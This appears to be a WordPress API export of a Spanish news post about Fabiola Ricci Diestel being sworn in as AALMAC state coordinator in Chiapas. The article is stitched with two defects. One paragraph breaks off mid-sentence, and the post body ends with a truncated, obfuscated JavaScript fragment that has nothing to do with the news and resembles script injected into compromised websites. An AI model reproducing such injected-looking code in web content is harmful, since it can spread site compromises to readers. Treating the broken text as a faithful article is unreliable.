{"id":22976,"date":"2025-07-15T04:35:30","date_gmt":"2025-07-15T04:35:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22976"},"modified":"2025-07-15T04:35:31","modified_gmt":"2025-07-15T04:35:31","slug":"toma-protesta-fabiola-ricci-como-coordinadora-estatal-de-la-aalmac-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22976","title":{"rendered":"Toma protesta Fabiola Ricci como Coordinadora Estatal de la AALMAC en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"22977\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000222470-1024x682.jpg\" alt=\"\" class=\"wp-image-22977\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000222470-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000222470-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000222470-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000222470-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000222470.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"707\" data-id=\"22978\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000222510-1024x707.jpg\" alt=\"\" class=\"wp-image-22978\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000222510-1024x707.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000222510-300x207.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000222510-768x530.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000222510-1536x1060.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000222510-110x75.jpg 110w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000222510.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 14 de julio de 2025.- En el marco del Encuentro Nacional de Pueblos M\u00e1gicos, la presidenta municipal de San Crist\u00f3bal de Las Casas, Mtra. Fabiola Ricci Diestel, asumi\u00f3 oficialmente la Coordinaci\u00f3n Estatal de la Asociaci\u00f3n de Autoridades Locales de M\u00e9xico A.C. (AALMAC) en Chiapas.<\/p>\n\n\n\n<p>Durante el acto protocolario, tambi\u00e9n rindieron protesta la alcaldesa de Ocosingo, Manuela Ang\u00e9lica M\u00e9ndez Cruz, y el presidente municipal de Palenque, Jorge Cabrera Aguilar, quienes se integran a esta nueva estructura de representaci\u00f3n municipal en el estado.<\/p>\n\n\n\n<p>La ceremonia fue encabezada por el Lic. Armando Quintero Mart\u00ednez, titular del Instituto Nacional para el Federalismo y el Desarrollo Municipal (INAFED) de la Secretar\u00eda de Gobernaci\u00f3n, quien destac\u00f3 la importancia de fortalecer los liderazgos municipales desde lo local. Asimismo, estuvieron presentes la presidenta municipal de Morole\u00f3n, Guanajuato, Alma Denisse S\u00e1nchez Barrag\u00e1n, en su calidad de Presidenta Nacional de la AALMAC, y el Director General de la organizaci\u00f3n, Hermilo P\u00e9rez Cabrera.<\/p>\n\n\n\n<p>Este nombramiento marca un hito para San Crist\u00f3bal de Las Casas, al posicionar a su alcaldesa como figura clave en la articulaci\u00f3n de pol\u00edticas p\u00fablicas locales con una visi\u00f3n nacional. Desde su nuevo cargo, Ricci Diestel tendr\u00e1 la responsabilidad de impulsar una agenda de fortalecimiento institucional, desarrollo sostenible y coordinaci\u00f3n entre<\/p>\n\n\n\n<p>Con esta designaci\u00f3n, Chiapas adquiere una voz fortalecida en la AALMAC, mientras que San Crist\u00f3bal de Las Casas reafirma su liderazgo en gesti\u00f3n p\u00fablica, desarrollo local y promoci\u00f3n tur\u00edstica a nivel nacional.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>San Crist\u00f3bal de Las Casas, 14 de julio de 2025.- En el marco del Encuentro Nacional de Pueblos M\u00e1gicos, la presidenta municipal de San Crist\u00f3bal de Las Casas, Mtra. Fabiola Ricci Diestel, asumi\u00f3 oficialmente la Coordinaci\u00f3n Estatal de la Asociaci\u00f3n de Autoridades Locales de M\u00e9xico A.C. (AALMAC) en Chiapas. Durante el acto protocolario, tambi\u00e9n rindieron &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22977,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22976","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22976","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22976"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22976\/revisions"}],"predecessor-version":[{"id":22979,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22976\/revisions\/22979"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22977"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22976"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22976"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22976"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}